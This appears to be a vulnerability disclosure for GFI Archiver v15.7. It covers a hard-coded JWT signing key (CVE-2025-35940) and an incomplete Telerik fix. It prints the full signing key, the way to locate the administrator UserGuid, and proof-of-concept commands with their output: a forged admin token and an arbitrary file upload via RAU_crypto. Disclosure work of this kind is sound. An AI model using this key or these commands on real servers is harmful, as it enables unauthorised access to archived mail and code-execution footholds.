GFI Archiver v15.7 Multiple vulnerabilities

Multiple vulnerabilities exist in GFI Archiver v15.7.

CVE-2025-35940 Hard-coded ArchiverSpaApi JWT Signing Key (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) 

The ArchiverSpaApi http://ASP.NET application uses a hard-coded JWT signing key "#L_yJh-hWb!D_HkUxv3Hg8?52Bf9+ZuWFM@2xK7bGpTyzGjv3RDYW-SHsRMPcu@^3BNN!!VFfwz-c$Za+cS86UAm3FjAjgekF%GEyVRtS-nh^RgqnaLZWtEcVQGPv+" (without quotes). An unauthenticated remote attacker can generate and use a verifiable JWT token to access protected ArchiverSpaApi URL endpoints. The attacker would need a valid UserGuid to put in the JWT token to impersonate an Archiver user. The UserGuid for the default Administrator user can be found in <PRODUCT_INSTALLATION_DIR>\Archiver\ASPNET\Api\Profiles\Administrator:

[...]

<MailBoxList>&lt;?xml version="1.0" encoding="utf-16"?&gt;

&lt;MailboxUserHolder xmlns:xsd="<http://www.w3.org/2001/XMLSchema>" xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>" Version="7.01"&gt;

  &lt;MailboxUsers&gt;

    &lt;MailboxUser DisplayName="Administrator (Administrator)" UserGuid="1b9f1032b920284b93bf33d192619bf4" Deletable="false" Accessable="true" /&gt;

  &lt;/MailboxUsers&gt;

&lt;/MailboxUserHolder&gt;</MailBoxList>

[...]

PoC:

python3 gfi_archiver_api_static_jwt_key.py -u 'http://<target-host>/ArchiverSpaApi/api/archive/search/saved' -s '<UserGuid>'

[*] Generating a JWT token with a hard-coded signing key...

[+] JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1lIjoiQWRtaW5pc3RyYXRvciIsInN1YiI6ImU5MDAzNjVhMGQ1MGRjNGRiNDViODM4NGQwZmM0ZDAxIiwidW5pcXVlX25hbWUiOiJBZG1pbmlzdHJhdG9yIiwiZmFtaWx5X25hbWUiOiJBZG1pbmlzdHJhdG9yIiwiZW1haWwiOiJhZG1pbmlzdHJhdG9yQGdmaWRzLmxvY2FsIiwicm9sZSI6IlVzZXIiLCJwZXJtaXNzaW9uIjpbIkF1ZGl0aW5nQWRtaW5pc3RyYXRpb24iLCJBdWRpdGluZ1ZpZXdlciIsIkNvbm5lY3RUaHJ1SU1BUCIsIkNyZWF0ZU9yQXNzaWduTGFiZWxzVG9FbWFpbHMiLCJEZWxldGVFbWFpbHNGcm9tTWFpbGJveFdpdGhBY2Nlc3MiLCJEZWxldGVFbWFpbHNGcm9tT3duTWFpbGJveCIsIkZpbGVBcmNoaXZlQXNzaXN0YW50QXJjaGl2aW5nIiwiR2VuZXJhbEFkbWluaXN0cmF0aW9uIiwiTWFudWFsbHlBcmNoaXZlRW1haWxzVG9NYWlsYm94V2l0aEFjY2VzcyIsIk1hbnVhbGx5QXJjaGl2ZUVtYWlsc1RvT3duTWFpbGJveCIsIk1hbnVhbGx5QXJjaGl2ZUZpbGVzIiwiUmVuYW1lRm9sZGVycyIsIlJvbGVBY2Nlc3NBZG1pbmlzdHJhdGlvbiJdLCJuYmYiOjE3MzY5Njg5NjIsImV4cCI6MTczNjk3MDgyMiwiaXNzIjoiR0ZJIEFyY2hpdmVyIn0.Gaq55HYm1g90-upv4vO3M26HCkVz9ZMHFeIpCE0-zoM

[*] Accessing <http://<target-host>>/ArchiverSpaApi/api/archive/search/saved with the generated JWT token...

[*] Response:

{"Code":200,"Version":"20240.1126.157.0","Payload":[{"savedSearch":{"id":"ff05aa7e-fe25-43c6-b23c-8f4d3b17277c","name":"LargeEmail"},"type":"Advanced","email":{"attachment":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"calendar":{"location":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"fax":{"type":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"file":{"fileName":null,"fileType":null,"fileDate":{"dateRange":"any","minDate":null,"maxDate":null}},"advanced":{"archives":["*"],"include":[{"field":null,"rangeField":{"fieldName":"msgsize","operator":">","value":1024},"tag":null,"folder":null}],"exclude":[],"user":{"ID":"e900365a0d50dc4db45b8384d0fc4d01","ProxyEmails":[],"DisplayName":"Administrator","UserName":"Administrator","Mail":"[email protected]"},"booleanFlag":"AND","sentDate":null}},{"savedSearch":{"id":"ff05aa7e-fe25-43c6-b23c-8f4d3b17277b","name":"Last30days"},"type":"Advanced","email":{"attachment":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"calendar":{"location":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"fax":{"type":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"file":{"fileName":null,"fileType":null,"fileDate":{"dateRange":"any","minDate":null,"maxDate":null}},"advanced":{"archives":["*"],"include":[{"field":{"fieldName":"attachmentandbody","query":"xfirstword"},"rangeField":null,"tag":null,"folder":null}],"exclude":[],"user":{"ID":"e900365a0d50dc4db45b8384d0fc4d01","ProxyEmails":[],"DisplayName":"Administrator","UserName":"Administrator","Mail":"[email protected]"},"booleanFlag":"AND","sentDate":"month"}},{"savedSearch":{"id":"ff05aa7e-fe25-43c6-b23c-8f4d3b17277a","name":"Last7days"},"type":"Advanced","email":{"attachment":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"calendar":{"location":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"fax":{"type":null,"contains":null,"from":null,"subject":null,"to":null,"sentDate":{"dateRange":"any","minDate":null,"maxDate":null}},"file":{"fileName":null,"fileType":null,"fileDate":{"dateRange":"any","minDate":null,"maxDate":null}},"advanced":{"archives":["*"],"include":[{"field":{"fieldName":"attachmentandbody","query":"xfirstword"},"rangeField":null,"tag":null,"folder":null}],"exclude":[],"user":{"ID":"e900365a0d50dc4db45b8384d0fc4d01","ProxyEmails":[],"DisplayName":"Administrator","UserName":"Administrator","Mail":"[email protected]"},"booleanFlag":"AND","sentDate":"week"}}]}

Incomplete security fix in v15.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

The release notes for GFI Archiver v15.7 at https://gfi.ai/products-and-solutions/network-security-solutions/archiver/resources/documentation/product-releases state "resolved vulnerabilities: CVE-2019-18935, CVE-2017-11317, CVE-2014-2217", probably in response to ZDI advisory https://www.zerodayinitiative.com/advisories/ZDI-24-1671/.
However, it looks like the Telerik Web UI (i.e., Telerik.Web.UI.dll) version in GFI Archive 15.7 is 2013.1.417 and the PoC for CVE-2017-11317 at https://github.com/bao7uo/RAU_crypto still works:

python3 RAU_crypto.py -P 'C:\\Windows\\Temp' 2013.1.417 /usr/bin/passwd <http://<target-host>>/Archiver/Telerik.Web.UI.WebResource.axd?type=rau

RAU_crypto by Paul Taylor / @bao7uo

CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Local file path: /usr/bin/passwd

Destination file name: passwd

Destination path: C:\\Windows\\Temp

Version: 2013.1.417

Preparing payload...

Payload prep done

Preparing to send request to http://<target-host>/Archiver/Telerik.Web.UI.WebResource.axd?type=rau

Request done

{"fileInfo":{"FileName":"RAU_crypto.bypass","ContentType":"text/html","ContentLength":118168,"DateJson":"2019-01-02T03:04:05.067Z","Index":0}, "metaData":"CS8S/Z0J/b2982DRxDin0BBslA7fI0cWMuWlPu4W3Fn4b33Z0hQVQCUP71PBbGFUekWDSYfi+clapiJ/VqwCXbOdM4tTDHuN/bJ5tVyBeRaWEPw08wHDNvS6XkL/J/ZH+Jk5ph/74j/JrbLrIsjrW2fDCY9rlPlVnyxnOICbNv0KYp/+2/wAFq0/6VSPBI/ljau8C/U7OIWMuyuRYi/lK+oOCpe/9sWSPWs/DPHjYEHxTQeJURchx0UN+3W0oQHwGu53bU3uH3q1ewy/hGWPprnd3BKy42FPqJHtu8aqng1zHmPwrP3kMAlTMg4AH5cdE5khcCrhoy/Y8DCcRCDgPMNi/pgt7I2uBODsQ2kfnkCkcA5UAaJaBPYU/KHeWyegiBqSTkVgc4ONr87bYlXx47PuJkD6PNZ4mAHUZp2ptB5jhWZnKTOgu2rxpHNNPAOpxwaz6e+4if1UhQdRjGTJbw==" }